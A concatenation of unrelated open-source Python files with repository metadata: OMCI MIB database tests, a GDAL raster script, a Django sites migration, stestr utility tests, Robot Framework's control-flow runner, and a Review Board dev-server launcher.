def test_byte_and_short_field_serialization(self):
self.db.start()
self.db.add(_DEVICE_ID)
class_id = UniG.class_id
inst_id = 0
attributes = {
'administrative_state': int(1), # ByteField
'non_omci_management_identifier': int(12345) # IPField
}
self.db.set(_DEVICE_ID, class_id, inst_id, attributes)
data = self.db.query(_DEVICE_ID, class_id, inst_id, attributes.keys())
self.assertTrue(all(isinstance(data[k], type(attributes[k])) for k in attributes.keys()))
self.assertTrue(all(data[k] == attributes[k] for k in attributes.keys()))
def test_int_field_serialization(self):
self.db.start()
self.db.add(_DEVICE_ID)
class_id = PriorityQueueG.class_id
inst_id = 0
attributes = {
'related_port': int(1234567) # IntField
}
self.db.set(_DEVICE_ID, class_id, inst_id, attributes)
data = self.db.query(_DEVICE_ID, class_id, inst_id, attributes.keys())
self.assertTrue(all(isinstance(data[k], type(attributes[k])) for k in attributes.keys()))
self.assertTrue(all(data[k] == attributes[k] for k in attributes.keys()))
def test_long_field_serialization(self):
self.db.start()
self.db.add(_DEVICE_ID)
class_id = PriorityQueueG.class_id
inst_id = 0
attributes = {
'packet_drop_queue_thresholds': int(0x1234) # LongField
}
self.db.set(_DEVICE_ID, class_id, inst_id, attributes)
data = self.db.query(_DEVICE_ID, class_id, inst_id, attributes.keys())
self.assertTrue(all(isinstance(data[k], type(attributes[k])) for k in attributes.keys()))
self.assertTrue(all(data[k] == attributes[k] for k in attributes.keys()))
def test_bit_field_serialization(self):
self.db.start()
self.db.add(_DEVICE_ID)
class_id = OntG.class_id
inst_id = 0
attributes = {
'extended_tc_layer_options': long(0x1234), # BitField(16)
}
self.db.set(_DEVICE_ID, class_id, inst_id, attributes)
data = self.db.query(_DEVICE_ID, class_id, inst_id, attributes.keys())
self.assertTrue(all(isinstance(data[k], type(attributes[k])) for k in attributes.keys()))
self.assertTrue(all(data[k] == attributes[k] for k in attributes.keys()))
def test_list_field_serialization(self):
self.db.start()
self.db.add(_DEVICE_ID)
class_id = VlanTaggingFilterData.class_id
inst_id = 0
vlan_filter_list = [0] * 12
vlan_filter_list[0] = 0x1234
attributes = {
'vlan_filter_list': vlan_filter_list, # FieldListField
'forward_operation': 0,
'number_of_entries': 1
}
self.db.set(_DEVICE_ID, class_id, inst_id, attributes)
data = self.db.query(_DEVICE_ID, class_id, inst_id, attributes.keys())
self.assertTrue(all(isinstance(data[k], type(attributes[k])) for k in attributes.keys()))
self.assertTrue(all(data[k] == attributes[k] for k in attributes.keys()))
def test_complex_json_serialization(self):
self.db.start()
self.db.add(_DEVICE_ID)
class_id = ExtendedVlanTaggingOperationConfigurationData.class_id
inst_id = 0x202
table_data = VlanTaggingOperation(
filter_outer_priority=15,
filter_inner_priority=8,
filter_inner_vid=1024,
filter_inner_tpid_de=5,
filter_ether_type=0,
treatment_tags_to_remove=1,
pad3=2,
treatment_outer_priority=15,
treatment_inner_priority=8,
treatment_inner_vid=1024,
treatment_inner_tpid_de=4
)
attributes = dict(
received_frame_vlan_tagging_operation_table=table_data
)
self.db.set(_DEVICE_ID, class_id, inst_id, attributes)
data = self.db.query(_DEVICE_ID, class_id, inst_id, attributes.keys())
table_as_dict = json.loads(table_data.to_json())
self.assertTrue(all(isinstance(data['received_frame_vlan_tagging_operation_table'][0].fields[k],
type(attributes['received_frame_vlan_tagging_operation_table'].fields[k]))
for k in attributes['received_frame_vlan_tagging_operation_table'].fields.keys()))
self.assertTrue(all(data['received_frame_vlan_tagging_operation_table'][0].fields[k] ==
attributes['received_frame_vlan_tagging_operation_table'].fields[k]
for k in attributes['received_frame_vlan_tagging_operation_table'].fields.keys()))
self.assertTrue(all(data['received_frame_vlan_tagging_operation_table'][0].fields[k] == table_as_dict[k]
for k in table_as_dict.keys()))
if __name__ == '__main__':
main()
| {
"content_hash": "45ffd94cbf3222bc4c8f07d83b7c42f5",
"timestamp": "",
"source": "github",
"line_count": 506,
"max_line_length": 113,
"avg_line_length": 39.13636363636363,
"alnum_prop": 0.6098065949603595,
"repo_name": "opencord/voltha",
"id": "cd5cadf77199d6ee76acac34c0819f9f8c6c5801",
"size": "20403",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tests/utests/voltha/extensions/omci/test_mib_db_dict.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "C",
"bytes": "30265"
},
{
"name": "Dockerfile",
"bytes": "2881"
},
{
"name": "Go",
"bytes": "181529"
},
{
"name": "Jinja",
"bytes": "25855"
},
{
"name": "Makefile",
"bytes": "76329"
},
{
"name": "Python",
"bytes": "9758796"
},
{
"name": "RobotFramework",
"bytes": "10188"
},
{
"name": "Ruby",
"bytes": "1126"
},
{
"name": "Shell",
"bytes": "758475"
},
{
"name": "XSLT",
"bytes": "175917"
}
],
"symlink_target": ""
} |
import datetime
from osgeo import gdal
import numpy as np
def cells(array):
window = array[480:510, 940:970]
return window
np.set_printoptions(precision=2, linewidth=700)
path = 'C:\\Recharge_GIS\\OSG_Data\\current_use'
raster = 'aws_ras_15apr1'
aws_open = gdal.Open('{a}\\{b}.tif'.format(a=path, b=raster))
dataset = aws_open
taw = np.array(aws_open.GetRasterBand(1).ReadAsArray(), dtype=float)
min_val = np.ones(taw.shape) * 0.001
taw = np.maximum(taw, min_val)
aws_open = []
path = 'C:\\Recharge_GIS\\OSG_Data\\qgis_rasters'
raster = 'aws_mm_21apr_std'
aws_st_open = gdal.Open('{a}\\{b}.tif'.format(a=path, b=raster))
taw_st = np.array(aws_st_open.GetRasterBand(1).ReadAsArray(), dtype=float)
taw_st = np.maximum(taw_st, min_val)
aws_st_open = []
result = np.where(taw_st > taw, taw_st, taw)
outputs = [result, taw]
output_names = ['aws_mod', 'taw']
x = 0
now = datetime.datetime.now()
tag = '{}_{}_{}_{}'.format(now.month, now.day, now.hour, now.minute)
for element in outputs:
name = output_names[x]
print "Saving {a}".format(a=name)
driver = gdal.GetDriverByName('GTiff')
filename = 'C:\\Recharge_GIS\\OSG_Data\\qgis_rasters\\{a}_{b}.tif'.format(a=name, b=tag)
cols = dataset.RasterXSize
rows = dataset.RasterYSize
bands = dataset.RasterCount
band = dataset.GetRasterBand(1)
datatype = band.DataType
outDataset = driver.Create(filename, cols, rows, bands, datatype)
geoTransform = dataset.GetGeoTransform()
outDataset.SetGeoTransform(geoTransform)
proj = dataset.GetProjection()
outDataset.SetProjection(proj)
outBand = outDataset.GetRasterBand(1)
outBand.WriteArray(element, 0, 0)
x += 1
| {
"content_hash": "e3cec5c4885c7fea69fd490b414b03cb",
"timestamp": "",
"source": "github",
"line_count": 51,
"max_line_length": 92,
"avg_line_length": 32.88235294117647,
"alnum_prop": 0.6815742397137746,
"repo_name": "NMTHydro/Recharge",
"id": "adccae767c722c21821493bc13ac54c2e9b4baac",
"size": "1678",
"binary": false,
"copies": "1",
"ref": "refs/heads/develop",
"path": "zobs/orecharge/Point_Analysis/aws_work.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "1871063"
}
],
"symlink_target": ""
} |
from __future__ import unicode_literals
import django.contrib.sites.models
from django.contrib.sites.models import _simple_domain_name_validator
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = []
operations = [
migrations.CreateModel(
name='Site',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('domain', models.CharField(max_length=100, verbose_name='domain name', validators=[_simple_domain_name_validator])),
('name', models.CharField(max_length=50, verbose_name='display name')),
],
options={
'ordering': ('domain',),
'db_table': 'django_site',
'verbose_name': 'site',
'verbose_name_plural': 'sites',
},
bases=(models.Model,),
managers=[
('objects', django.contrib.sites.models.SiteManager()),
],
),
]
| {
"content_hash": "2c3cc3fdf4ee486b5ef95991252699d1",
"timestamp": "",
"source": "github",
"line_count": 31,
"max_line_length": 133,
"avg_line_length": 35.58064516129032,
"alnum_prop": 0.543064369900272,
"repo_name": "diego-d5000/MisValesMd",
"id": "9d9be48244a47127178eea2881f25dcfe401e026",
"size": "1128",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "env/lib/python2.7/site-packages/django/contrib/sites/migrations/0001_initial.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "115465"
},
{
"name": "Groff",
"bytes": "22"
},
{
"name": "HTML",
"bytes": "1415583"
},
{
"name": "JavaScript",
"bytes": "1381588"
},
{
"name": "PowerShell",
"bytes": "8325"
},
{
"name": "Python",
"bytes": "8107650"
},
{
"name": "Shell",
"bytes": "11786"
}
],
"symlink_target": ""
} |
from stestr.tests import base
from stestr import utils
class TestUtils(base.TestCase):
def test_cleanup_test_name_defaults(self):
test_id_no_attrs = 'test.TestThing.test_thing'
test_id_with_attrs = 'test.TestThing.test_thing[attr1,attr2,att3]'
test_id_with_scenario = 'test.TestThing.test_thing(mysql)'
test_id_with_attrs_and_scenario = ('test.TestThing.test_thing[attr]'
'(mysql)')
result_no_attrs = utils.cleanup_test_name(test_id_no_attrs)
self.assertEqual(test_id_no_attrs, result_no_attrs)
result_with_attrs = utils.cleanup_test_name(test_id_with_attrs)
self.assertEqual(test_id_no_attrs, result_with_attrs)
result_with_scenario = utils.cleanup_test_name(test_id_with_scenario)
self.assertEqual(test_id_with_scenario, result_with_scenario)
result_with_attr_and_scenario = utils.cleanup_test_name(
test_id_with_attrs_and_scenario)
self.assertEqual(test_id_with_scenario, result_with_attr_and_scenario)
def test_cleanup_test_name_leave_attrs(self):
test_id_no_attrs = 'test.TestThing.test_thing'
test_id_with_attrs = 'test.TestThing.test_thing[attr1,attr2,att3]'
test_id_with_scenario = 'test.TestThing.test_thing(mysql)'
test_id_with_attrs_and_scenario = ('test.TestThing.test_thing[attr]'
'(mysql)')
result_no_attrs = utils.cleanup_test_name(test_id_no_attrs,
strip_tags=False)
self.assertEqual(test_id_no_attrs, result_no_attrs)
result_with_attrs = utils.cleanup_test_name(test_id_with_attrs,
strip_tags=False)
self.assertEqual(test_id_with_attrs, result_with_attrs)
result_with_scenario = utils.cleanup_test_name(test_id_with_scenario,
strip_tags=False)
self.assertEqual(test_id_with_scenario, result_with_scenario)
result_with_attr_and_scenario = utils.cleanup_test_name(
test_id_with_attrs_and_scenario, strip_tags=False)
self.assertEqual(test_id_with_attrs_and_scenario,
result_with_attr_and_scenario)
def test_cleanup_test_name_strip_scenario_and_attrs(self):
test_id_no_attrs = 'test.TestThing.test_thing'
test_id_with_attrs = 'test.TestThing.test_thing[attr1,attr2,att3]'
test_id_with_scenario = 'test.TestThing.test_thing(mysql)'
test_id_with_attrs_and_scenario = ('test.TestThing.test_thing[attr]'
'(mysql)')
result_no_attrs = utils.cleanup_test_name(test_id_no_attrs,
strip_scenarios=True)
self.assertEqual(test_id_no_attrs, result_no_attrs)
result_with_attrs = utils.cleanup_test_name(test_id_with_attrs,
strip_scenarios=True)
self.assertEqual(test_id_no_attrs, result_with_attrs)
result_with_scenario = utils.cleanup_test_name(test_id_with_scenario,
strip_scenarios=True)
self.assertEqual(test_id_no_attrs, result_with_scenario)
result_with_attr_and_scenario = utils.cleanup_test_name(
test_id_with_attrs_and_scenario, strip_scenarios=True)
self.assertEqual(test_id_no_attrs,
result_with_attr_and_scenario)
def test_cleanup_test_name_strip_scenario(self):
test_id_no_attrs = 'test.TestThing.test_thing'
test_id_with_attrs = 'test.TestThing.test_thing[attr1,attr2,att3]'
test_id_with_scenario = 'test.TestThing.test_thing(mysql)'
test_id_with_attrs_and_scenario = ('test.TestThing.test_thing[attr]'
'(mysql)')
result_no_attrs = utils.cleanup_test_name(test_id_no_attrs,
strip_scenarios=True,
strip_tags=False)
self.assertEqual(test_id_no_attrs, result_no_attrs)
result_with_attrs = utils.cleanup_test_name(test_id_with_attrs,
strip_scenarios=True,
strip_tags=False)
self.assertEqual(test_id_with_attrs, result_with_attrs)
result_with_scenario = utils.cleanup_test_name(test_id_with_scenario,
strip_scenarios=True,
strip_tags=False)
self.assertEqual(test_id_no_attrs, result_with_scenario)
result_with_attr_and_scenario = utils.cleanup_test_name(
test_id_with_attrs_and_scenario, strip_scenarios=True,
strip_tags=False)
self.assertEqual('test.TestThing.test_thing[attr]',
result_with_attr_and_scenario)
| {
"content_hash": "c46562c0e8613a426702852d653bfa27",
"timestamp": "",
"source": "github",
"line_count": 84,
"max_line_length": 78,
"avg_line_length": 60.226190476190474,
"alnum_prop": 0.5742241549713382,
"repo_name": "masayukig/stestr",
"id": "88618f2553859c60236fc1d9eef5cd2c70226deb",
"size": "5604",
"binary": false,
"copies": "1",
"ref": "refs/heads/main",
"path": "stestr/tests/test_utils.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "328847"
},
{
"name": "Shell",
"bytes": "93"
}
],
"symlink_target": ""
} |
from collections import OrderedDict
from contextlib import contextmanager
import re
import time
from robot.errors import (BreakLoop, ContinueLoop, DataError, ExecutionFailed,
ExecutionFailures, ExecutionPassed, ExecutionStatus)
from robot.result import (For as ForResult, While as WhileResult, If as IfResult,
IfBranch as IfBranchResult, Try as TryResult,
TryBranch as TryBranchResult)
from robot.output import librarylogger as logger
from robot.utils import (cut_assign_value, frange, get_error_message, is_string,
is_list_like, is_number, plural_or_not as s, seq2str,
split_from_equals, type_name, Matcher, timestr_to_secs)
from robot.variables import is_dict_variable, evaluate_expression
from .statusreporter import StatusReporter
DEFAULT_WHILE_LIMIT = 10_000
class BodyRunner:
def __init__(self, context, run=True, templated=False):
self._context = context
self._run = run
self._templated = templated
def run(self, body):
errors = []
passed = None
for step in body:
try:
step.run(self._context, self._run, self._templated)
except ExecutionPassed as exception:
exception.set_earlier_failures(errors)
passed = exception
self._run = False
except ExecutionFailed as exception:
errors.extend(exception.get_errors())
self._run = exception.can_continue(self._context, self._templated)
if passed:
raise passed
if errors:
raise ExecutionFailures(errors)
class KeywordRunner:
def __init__(self, context, run=True):
self._context = context
self._run = run
def run(self, step, name=None):
context = self._context
runner = context.get_runner(name or step.name)
if context.dry_run:
return runner.dry_run(step, context)
return runner.run(step, context, self._run)
def ForRunner(context, flavor='IN', run=True, templated=False):
runners = {'IN': ForInRunner,
'IN RANGE': ForInRangeRunner,
'IN ZIP': ForInZipRunner,
'IN ENUMERATE': ForInEnumerateRunner}
runner = runners[flavor or 'IN']
return runner(context, run, templated)
class ForInRunner:
flavor = 'IN'
def __init__(self, context, run=True, templated=False):
self._context = context
self._run = run
self._templated = templated
def run(self, data):
result = ForResult(data.variables, data.flavor, data.values)
with StatusReporter(data, result, self._context, self._run) as status:
run_at_least_once = False
if self._run:
if data.error:
raise DataError(data.error)
run_at_least_once = self._run_loop(data, result)
if not run_at_least_once:
status.pass_status = result.NOT_RUN
self._run_one_round(data, result, run=False)
def _run_loop(self, data, result):
errors = []
executed = False
for values in self._get_values_for_rounds(data):
executed = True
try:
self._run_one_round(data, result, values)
except BreakLoop as exception:
if exception.earlier_failures:
errors.extend(exception.earlier_failures.get_errors())
break
except ContinueLoop as exception:
if exception.earlier_failures:
errors.extend(exception.earlier_failures.get_errors())
continue
except ExecutionPassed as exception:
exception.set_earlier_failures(errors)
raise exception
except ExecutionFailed as exception:
errors.extend(exception.get_errors())
if not exception.can_continue(self._context,
self._templated):
break
if errors:
raise ExecutionFailures(errors)
return executed
def _get_values_for_rounds(self, data):
if self._context.dry_run:
return [None]
values_per_round = len(data.variables)
if self._is_dict_iteration(data.values):
values = self._resolve_dict_values(data.values)
values = self._map_dict_values_to_rounds(values, values_per_round)
else:
values = self._resolve_values(data.values)
values = self._map_values_to_rounds(values, values_per_round)
return values
def _is_dict_iteration(self, values):
all_name_value = True
for item in values:
if is_dict_variable(item):
return True
if split_from_equals(item)[1] is None:
all_name_value = False
if all_name_value:
name, value = split_from_equals(values[0])
logger.warn(
"FOR loop iteration over values that are all in 'name=value' "
"format like '%s' is deprecated. In the future this syntax "
"will mean iterating over names and values separately like "
"when iterating over '&{dict} variables. Escape at least one "
"of the values like '%s\\=%s' to use normal FOR loop "
"iteration and to disable this warning."
% (values[0], name, value)
)
return False
def _resolve_dict_values(self, values):
result = OrderedDict()
replace_scalar = self._context.variables.replace_scalar
for item in values:
if is_dict_variable(item):
result.update(replace_scalar(item))
else:
key, value = split_from_equals(item)
if value is None:
raise DataError(
"Invalid FOR loop value '%s'. When iterating over "
"dictionaries, values must be '&{dict}' variables "
"or use 'key=value' syntax." % item
)
try:
result[replace_scalar(key)] = replace_scalar(value)
except TypeError:
raise DataError(
"Invalid dictionary item '%s': %s"
% (item, get_error_message())
)
return result.items()
def _map_dict_values_to_rounds(self, values, per_round):
if per_round > 2:
raise DataError(
'Number of FOR loop variables must be 1 or 2 when iterating '
'over dictionaries, got %d.' % per_round
)
return values
def _resolve_values(self, values):
return self._context.variables.replace_list(values)
def _map_values_to_rounds(self, values, per_round):
count = len(values)
if count % per_round != 0:
self._raise_wrong_variable_count(per_round, count)
# Map list of values to list of lists containing values per round.
return (values[i:i+per_round] for i in range(0, count, per_round))
def _raise_wrong_variable_count(self, variables, values):
raise DataError(
'Number of FOR loop values should be multiple of its variables. '
'Got %d variables but %d value%s.' % (variables, values, s(values))
)
def _run_one_round(self, data, result, values=None, run=True):
result = result.body.create_iteration()
if values is not None:
variables = self._context.variables
else: # Not really run (earlier failure, unexecuted IF branch, dry-run)
variables = {}
values = [''] * len(data.variables)
for name, value in self._map_variables_and_values(data.variables, values):
variables[name] = value
result.variables[name] = cut_assign_value(value)
runner = BodyRunner(self._context, run, self._templated)
with StatusReporter(data, result, self._context, run):
runner.run(data.body)
def _map_variables_and_values(self, variables, values):
if len(variables) == 1 and len(values) != 1:
return [(variables[0], tuple(values))]
return zip(variables, values)
class ForInRangeRunner(ForInRunner):
flavor = 'IN RANGE'
def _resolve_dict_values(self, values):
raise DataError(
'FOR IN RANGE loops do not support iterating over dictionaries.'
)
def _map_values_to_rounds(self, values, per_round):
if not 1 <= len(values) <= 3:
raise DataError(
'FOR IN RANGE expected 1-3 values, got %d.' % len(values)
)
try:
values = [self._to_number_with_arithmetic(v) for v in values]
except:
raise DataError(
'Converting FOR IN RANGE values failed: %s.'
% get_error_message()
)
values = frange(*values)
return ForInRunner._map_values_to_rounds(self, values, per_round)
def _to_number_with_arithmetic(self, item):
if is_number(item):
return item
number = eval(str(item), {})
if not is_number(number):
raise TypeError("Expected number, got %s." % type_name(item))
return number
class ForInZipRunner(ForInRunner):
flavor = 'IN ZIP'
_start = 0
def _resolve_dict_values(self, values):
raise DataError(
'FOR IN ZIP loops do not support iterating over dictionaries.'
)
def _map_values_to_rounds(self, values, per_round):
for item in values:
if not is_list_like(item):
raise DataError(
"FOR IN ZIP items must all be list-like, got %s '%s'."
% (type_name(item), item)
)
if len(values) % per_round != 0:
self._raise_wrong_variable_count(per_round, len(values))
return zip(*(list(item) for item in values))
class ForInEnumerateRunner(ForInRunner):
flavor = 'IN ENUMERATE'
def _resolve_dict_values(self, values):
self._start, values = self._get_start(values)
return ForInRunner._resolve_dict_values(self, values)
def _resolve_values(self, values):
self._start, values = self._get_start(values)
return ForInRunner._resolve_values(self, values)
def _get_start(self, values):
if not values[-1].startswith('start='):
return 0, values
start = self._context.variables.replace_string(values[-1][6:])
if len(values) == 1:
raise DataError('FOR loop has no loop values.')
try:
return int(start), values[:-1]
except ValueError:
raise ValueError("Invalid FOR IN ENUMERATE start value '%s'." % start)
def _map_dict_values_to_rounds(self, values, per_round):
if per_round > 3:
raise DataError(
'Number of FOR IN ENUMERATE loop variables must be 1-3 when '
'iterating over dictionaries, got %d.' % per_round
)
if per_round == 2:
return ((i, v) for i, v in enumerate(values, start=self._start))
return ((i,) + v for i, v in enumerate(values, start=self._start))
def _map_values_to_rounds(self, values, per_round):
per_round = max(per_round-1, 1)
values = ForInRunner._map_values_to_rounds(self, values, per_round)
return ([i] + v for i, v in enumerate(values, start=self._start))
def _raise_wrong_variable_count(self, variables, values):
raise DataError(
'Number of FOR IN ENUMERATE loop values should be multiple of '
'its variables (excluding the index). Got %d variables but %d '
'value%s.' % (variables, values, s(values))
)
class WhileRunner:
def __init__(self, context, run=True, templated=False):
self._context = context
self._run = run
self._templated = templated
def run(self, data):
run = self._run
executed_once = False
result = WhileResult(data.condition, data.limit)
with StatusReporter(data, result, self._context, run) as status:
if self._context.dry_run or not run:
try:
self._run_iteration(data, result, run)
except (BreakLoop, ContinueLoop):
pass
return
if data.error:
raise DataError(data.error)
limit = WhileLimit.create(data.limit, self._context.variables)
errors = []
while self._should_run(data.condition, self._context.variables) \
and limit.is_valid:
executed_once = True
try:
with limit:
self._run_iteration(data, result, run)
except BreakLoop:
break
except ContinueLoop:
continue
except ExecutionFailed as err:
errors.extend(err.get_errors())
if not err.can_continue(self._context, self._templated):
break
if not executed_once:
status.pass_status = result.NOT_RUN
self._run_iteration(data, result, run=False)
if errors:
raise ExecutionFailures(errors)
if not limit.is_valid:
raise DataError(limit.reason)
def _run_iteration(self, data, result, run):
runner = BodyRunner(self._context, run, self._templated)
with StatusReporter(data, result.body.create_iteration(), self._context, run):
runner.run(data.body)
def _should_run(self, condition, variables):
try:
condition = variables.replace_scalar(condition)
if is_string(condition):
return evaluate_expression(condition, variables.current.store)
return bool(condition)
except DataError as err:
raise DataError(f'Evaluating WHILE loop condition failed: {err}')
class IfRunner:
_dry_run_stack = []
def __init__(self, context, run=True, templated=False):
self._context = context
self._run = run
self._templated = templated
def run(self, data):
with self._dry_run_recursion_detection(data) as recursive_dry_run:
error = None
with StatusReporter(data, IfResult(), self._context, self._run):
for branch in data.body:
try:
if self._run_if_branch(branch, recursive_dry_run, data.error):
self._run = False
except ExecutionStatus as err:
error = err
self._run = False
if error:
raise error
@contextmanager
def _dry_run_recursion_detection(self, data):
dry_run = self._context.dry_run
if dry_run:
recursive_dry_run = data in self._dry_run_stack
self._dry_run_stack.append(data)
else:
recursive_dry_run = False
try:
yield recursive_dry_run
finally:
if dry_run:
self._dry_run_stack.pop()
def _run_if_branch(self, branch, recursive_dry_run=False, error=None):
context = self._context
result = IfBranchResult(branch.type, branch.condition)
if error:
run_branch = False
else:
try:
run_branch = self._should_run_branch(branch, context, recursive_dry_run)
except:
error = get_error_message()
run_branch = False
with StatusReporter(branch, result, context, run_branch):
runner = BodyRunner(context, run_branch, self._templated)
if not recursive_dry_run:
runner.run(branch.body)
if error and self._run:
raise DataError(error)
return run_branch
def _should_run_branch(self, branch, context, recursive_dry_run=False):
condition = branch.condition
variables = context.variables
if context.dry_run:
return not recursive_dry_run
if not self._run:
return False
if condition is None:
return True
try:
condition = variables.replace_scalar(condition)
if is_string(condition):
return evaluate_expression(condition, variables.current.store)
return bool(condition)
except DataError as err:
raise DataError(f'Evaluating {branch.type} condition failed: {err}')
class TryRunner:
def __init__(self, context, run=True, templated=False):
self._context = context
self._run = run
self._templated = templated
def run(self, data):
run = self._run
with StatusReporter(data, TryResult(), self._context, run):
if data.error:
self._run_invalid(data)
return False
error = self._run_try(data, run)
run_excepts_or_else = self._should_run_excepts_or_else(error, run)
if error:
error = self._run_excepts(data, error, run=run_excepts_or_else)
self._run_else(data, run=False)
else:
self._run_excepts(data, error, run=False)
error = self._run_else(data, run=run_excepts_or_else)
error = self._run_finally(data, run) or error
if error:
raise error
def _run_invalid(self, data):
error_reported = False
for branch in data.body:
result = TryBranchResult(branch.type, branch.patterns, branch.variable)
with StatusReporter(branch, result, self._context, run=False, suppress=True):
runner = BodyRunner(self._context, run=False, templated=self._templated)
runner.run(branch.body)
if not error_reported:
error_reported = True
raise ExecutionFailed(data.error)
raise ExecutionFailed(data.error)
def _run_try(self, data, run):
result = TryBranchResult(data.TRY)
return self._run_branch(data.try_branch, result, run)
def _should_run_excepts_or_else(self, error, run):
if not run:
return False
if not error:
return True
return not (error.skip or isinstance(error, ExecutionPassed))
def _run_branch(self, branch, result, run=True, error=None):
try:
with StatusReporter(branch, result, self._context, run):
if error:
raise error
runner = BodyRunner(self._context, run, self._templated)
runner.run(branch.body)
except ExecutionStatus as err:
if isinstance(err, ExecutionFailed) and err.syntax:
raise err
return err
else:
return None
def _run_excepts(self, data, error, run):
for branch in data.except_branches:
try:
run_branch = run and self._should_run_except(branch, error)
except DataError as err:
run_branch = True
pattern_error = err
else:
pattern_error = None
result = TryBranchResult(branch.type, branch.patterns,
branch.pattern_type, branch.variable)
if run_branch:
if branch.variable:
self._context.variables[branch.variable] = str(error)
error = self._run_branch(branch, result, error=pattern_error)
run = False
else:
self._run_branch(branch, result, run=False)
return error
def _should_run_except(self, branch, error):
if not branch.patterns:
return True
matchers = {
'GLOB': lambda m, p: Matcher(p, spaceless=False, caseless=False).match(m),
'LITERAL': lambda m, p: m == p,
'REGEXP': lambda m, p: re.match(rf'{p}\Z', m) is not None,
'START': lambda m, p: m.startswith(p)
}
if branch.pattern_type:
pattern_type = self._context.variables.replace_string(branch.pattern_type)
else:
pattern_type = 'LITERAL'
matcher = matchers.get(pattern_type.upper())
if not matcher:
raise DataError(f"Invalid EXCEPT pattern type '{pattern_type}', "
f"expected {seq2str(matchers, lastsep=' or ')}.")
for pattern in branch.patterns:
if matcher(error.message, self._context.variables.replace_string(pattern)):
return True
return False
def _run_else(self, data, run):
if data.else_branch:
result = TryBranchResult(data.ELSE)
return self._run_branch(data.else_branch, result, run)
def _run_finally(self, data, run):
if data.finally_branch:
result = TryBranchResult(data.FINALLY)
try:
with StatusReporter(data.finally_branch, result, self._context, run):
runner = BodyRunner(self._context, run, self._templated)
runner.run(data.finally_branch.body)
except ExecutionStatus as err:
return err
else:
return None
class WhileLimit:
is_valid = True
@classmethod
def create(cls, limit, variables):
try:
if not limit:
return IterationCountLimit(DEFAULT_WHILE_LIMIT)
if limit.upper() == 'NONE':
return NoLimit()
value = variables.replace_string(limit)
try:
count = int(value.replace(' ', ''))
if count <= 0:
return InvalidLimit(f"Iteration limit must be a positive integer, "
f"got: '{count}'.")
return IterationCountLimit(count)
except ValueError:
return DurationLimit(timestr_to_secs(value))
except Exception as error:
return InvalidLimit(error)
def limit_exceeded(self):
raise ExecutionFailed(f"WHILE loop was aborted because it did not finish within the "
f"limit of {self}. Use the 'limit' argument to increase or "
f"remove the limit if needed.")
def __enter__(self):
raise NotImplementedError
def __exit__(self, exc_type, exc_val, exc_tb):
return None
class DurationLimit(WhileLimit):
def __init__(self, max_time):
self.max_time = max_time
self.start_time = None
def __enter__(self):
if not self.start_time:
self.start_time = time.time()
if time.time() - self.start_time > self.max_time:
self.limit_exceeded()
def __str__(self):
return f'{self.max_time} seconds'
class IterationCountLimit(WhileLimit):
def __init__(self, max_iterations):
self.max_iterations = max_iterations
self.current_iterations = 0
def __enter__(self):
if self.current_iterations >= self.max_iterations:
self.limit_exceeded()
self.current_iterations += 1
def __str__(self):
return f'{self.max_iterations} iterations'
class NoLimit(WhileLimit):
def __enter__(self):
pass
class InvalidLimit(WhileLimit):
is_valid = False
def __init__(self, reason):
self.reason = f'Invalid WHILE loop limit: {reason}'
def __enter__(self):
raise DataError(self.reason)
| {
"content_hash": "1ec2f5720c1eb8e8341040aaf1f8acf8",
"timestamp": "",
"source": "github",
"line_count": 648,
"max_line_length": 93,
"avg_line_length": 37.09567901234568,
"alnum_prop": 0.5593643397953241,
"repo_name": "HelioGuilherme66/robotframework",
"id": "9a0d077df789a7c47ccb72486989c708d3aa3857",
"size": "24682",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "src/robot/running/bodyrunner.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "44706"
},
{
"name": "HTML",
"bytes": "86409"
},
{
"name": "JavaScript",
"bytes": "162950"
},
{
"name": "Python",
"bytes": "2671114"
},
{
"name": "RobotFramework",
"bytes": "1231105"
}
],
"symlink_target": ""
} |
import getopt
import os
import sys
DEFAULT_HOST = "0.0.0.0"
DEFAULT_PORT = "8080"
def usage():
print("usage: %s options" % sys.argv[0])
print()
print("OPTIONS:")
print(" -h Show this message")
print(" -H HOST Set server host (defaults to %s)" % DEFAULT_HOST)
print(" -p PORT Set server port (defaults to %s)" % DEFAULT_PORT)
def main():
# Assign default settings
server_host = DEFAULT_HOST
server_port = DEFAULT_PORT
# Do any command-line argument processing
(opts, args) = getopt.getopt(sys.argv[1:], 'hH:p:')
for opt, arg in opts:
if opt == '-h':
usage()
sys.exit(1)
elif opt == '-p':
server_port = arg
elif opt == '-H':
server_host = arg
else:
usage()
sys.exit(1)
# Ensure we're at the top-level Review Board directory
if not os.path.exists(os.path.join('reviewboard', 'manage.py')):
sys.stderr.write('This must be run from the top-level Review Board'
' directory\n')
sys.exit(1)
# Next, ensure settings_local.py exists where we expect it
if not os.path.exists('settings_local.py'):
sys.stderr.write('You must create a settings_local.py in the '
'top-level source \n'
'directory. You can use '
'contrib/conf/settings_local.py.tmpl\n'
'as a basis.\n')
sys.exit(1)
# Build ReviewBoard.egg-info if it doesn't already exist
if not os.path.exists('ReviewBoard.egg-info'):
os.system('%s ./setup.py egg_info'
% sys.executable)
# And now just boot up the server
os.system('%s -Wd ./reviewboard/manage.py runserver %s:%s --nostatic'
% (sys.executable, server_host, server_port))
if __name__ == "__main__":
main()
| {
"content_hash": "cbb1b1325d0d192dea753b2d4348e9be",
"timestamp": "",
"source": "github",
"line_count": 64,
"max_line_length": 76,
"avg_line_length": 30.1875,
"alnum_prop": 0.5450310559006211,
"repo_name": "reviewboard/reviewboard",
"id": "e9dec6c0f4b431737777e7624a0f0ca6863fa1e5",
"size": "1956",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "contrib/internal/devserver.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "10167"
},
{
"name": "Dockerfile",
"bytes": "7721"
},
{
"name": "HTML",
"bytes": "226489"
},
{
"name": "JavaScript",
"bytes": "3991608"
},
{
"name": "Less",
